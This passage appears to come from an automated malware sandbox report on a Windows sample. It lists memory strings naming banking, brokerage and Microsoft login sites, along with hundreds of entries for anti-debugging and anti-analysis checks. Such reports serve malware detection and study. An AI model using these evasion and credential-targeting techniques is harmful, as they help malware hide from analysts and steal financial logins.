            Source: 5-19-2H.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 5-19-2H.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 5-19-2H.6.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 5-19-2H.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 5-19-2H.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 5-19-2H.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: firefox.exe, 00000009.00000002.2847233774.0000022DC15AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll::&
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 5-19-2H.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 5-19-2H.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 5-19-2H.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 5-19-2H.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 5-19-2H.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 5-19-2H.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 5-19-2H.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 5-19-2H.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172D3 LdrLoadDll,2_2_004172D3
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF6AAF BlockInput,0_2_00AF6AAF
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AA3D19
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AD3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00AD3920
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABE01E LoadLibraryA,GetProcAddress,0_2_00ABE01E
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_01339058 mov eax, dword ptr fs:[00000030h]0_2_01339058
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_0133A718 mov eax, dword ptr fs:[00000030h]0_2_0133A718
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_0133A6B8 mov eax, dword ptr fs:[00000030h]0_2_0133A6B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]2_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]2_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]2_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]2_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]2_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]2_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]2_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]2_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]2_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]2_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]2_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]2_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
